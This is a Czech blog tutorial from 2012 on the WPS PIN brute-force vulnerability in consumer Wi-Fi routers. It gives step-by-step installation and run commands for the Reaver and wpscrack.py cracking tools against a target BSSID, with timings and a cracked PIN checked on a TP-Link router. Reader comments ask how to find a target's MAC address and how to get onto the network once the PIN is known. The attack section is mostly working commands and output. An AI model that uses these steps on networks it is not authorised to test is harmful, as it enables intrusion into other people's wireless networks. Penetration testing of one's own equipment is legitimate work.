02.01
2012

Před pár dny prolétla v internetových médiích zpráva o chybě v návrhu WPS (WiFi Protected Setup) autentizace. Zneužití této chyby se dá poměrně “snadně” dosáhnout útokem hrubou silou (brute-force) na osmimístný PIN kód zmíněného WPS. Hodí se podotknout, že tato funkce (WPS) je implementována ve spoustě wifi routerů většiny zvučných značek. Detaily o této zranitelnosti se dozvíte třeba v tomto pdf, a zvídavý čtenář si jistě poradí s vyhledáním relevantních informací na internetu např. zde. :) K otestování možného útoku na tuto zranitelnost jsou k dispozici aktuálně dva nástroje, a to Reaver-WPS a WPScrack, u kterých si popíšeme instalaci a příklady základního použití.

Vše provedeme jak jinak než na operačním systému BackTrack 5.

Reaver-WPS v akci

wpscrack.py v akci

 

Otestované wireless ovladače funkční s Reaver-WPS:

ath5k
ath9k
b43
carl19170
ipw2000
iwlagn
rtl8187
rt2800pci
rt2800usb
rt73usb
zd1211rw

Instalace Reaver-WPS

Reaver je možno zkompilovat buď přímo z archívu s poslední verzí, popř. stažením aktuálních zdrojových kódů z svn.

Stáhneme archív s poslední public verzí

http://code.google.com/p/reaver-wps/downloads/list

Rozbalíme a zkompilujeme

tar xf reaver-1.2.tar.gz
cd reaver-1.2/src
./configure
make
make install

Nebo si z svn stáhneme aktuální zdrojové kódy

svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

Přejdeme do adresáře se zdrojáky a zkompilujeme

cd reaver-wps-read-only/src
./configure
make
make install

A spustíme pro přehled možností nastavení

./reaver –help

reaver-help

Příklad pro spuštění reaver

./reaver -i IFACE -b BSSID -e SSID -c CHANNEL -vv
./reaver -i mon0 -b 00:01:02:03:04:05 -e nazev_site -c 7 -vv

Běžící Reaver

reaver-run2

Po téměř 50 minutách běhu Reaveru hotovo jen 10% úlohy, při rychlosti 2 sekundy/pokus

reaver-run_10

WPS PIN cracked po necelých 9 hodinách :)

reaver-pin_crack

 

wpscrack.py

Instalace wpscrack.py a potřebných závislostí. Je o něco rychlejší než Reaver, ale nebude fungovat se všemi Wi-Fi adaptéry.

apt-get install python-pycryptopp

Stáhneme aktuální verzi Scapy

Archív se Scapy rozbalíme a nainstalujeme

unzip scapy-xxxx
cd scapy-xxxx
python setup.py install

Vytvoříme si adresář wpscrack, přejdeme do něj, stáhneme archív wpscrack.zip a rozbalíme

mkdir wpscrack
cd wpscrack
wget http://dl.dropbox.com/u/22108808/wpscrack.zip
unzip wpscrack.zip

S největší pravděpodobností se bude při spuštění wpscrack.py zobrazovat tato varovná hláška

WARNING: No route found for IPv6 destination :: (no default route?)

Je to jen kosmetická vada, ale pokud nechcete, ať se při každém spuštění zobrazuje, je potřeba přidat tyto dva řádky do kódu wpscrack.py

import logging
logging.getLogger(“scapy.runtime”).setLevel(logging.ERROR)

Takže vše bude vypadat takto

import logging
logging.getLogger(“scapy.runtime”).setLevel(logging.ERROR)
import time, threading, hmac, hashlib, sys, optparse, random
from struct import pack, unpack
from Crypto.Cipher import AES
from scapy.all import *

A teď už spustíme pro přehled možností nastavení

python wpscrack.py –help

wpscrack-help

Příklad pro spuštění wpscrack.py

python wpscrack.py –iface IFACE –bssid BSSID –client CLIENT_MAC –ssid SSID –verbose
python wpscrack.py –iface mon0 –bssid 00:01:02:03:04:05 –client 06:07:08:09:10:11 –ssid nazev_site –verbose

Běžící wpscrack.py

wpscrack-run2

WPS PIN cracked! :)

wpscrack-pin_crack

A nakonec kontrola správnosti WPS PINu ve webovém rozhraní testovaného wifi routeru TP-Link TL-WR1043ND

wpspin-tplink

Edit: od 3.1. je Reaver v repozitářích BackTrack Linux:

Reaver v1.3 WiFi Protected Setup Attack Tool

apt-get install reaver

Jen pro info, v současné době se pracuje také na portech pro Android a Maemo, čímž se zneužitelnost této zranitelnosti stane ještě více reálnou.

Any questions? :)

Súvisiace články: Wifite – WEP a WPA key crackerWPA2 Hole196 Vulnerabilitycat sk-spell > slovenský-aircrack-ng-wordlistBey bey WEP |SWSE & Wireless LAN Security and Penetration Megaprimer|, WPS access point scan?, Reaver & Walsh @ N900, Inflator [ Reaver Command generator ]

8 comments so far

Add Your Comment
  1. Hi there, really useful article. I would like to use the screenshot you provided (of course with due credit to your website) in my article on WPS :)

  2. Thx. We agree, use the screenshot and mention the source…

  3. Thx a lot. Will surely mention the source…

  4. i have a quetion…

    i don’t know the MAC Address which i want to crack.
    but how did you konw the MAC Address of the target AP??

  5. Every wireless client software can show you that, there are even tools for WPS scaning + standard tools like airodump-ng, or Kismet…

  6. I would like to ask what determines the speed of attempts each second by strenght of signal or data or beacons or….. thnx very good

  7. Yes, mostly signal strenght but also card chipset.

  8. yes got the pin and now how do I find the password or access the wifi network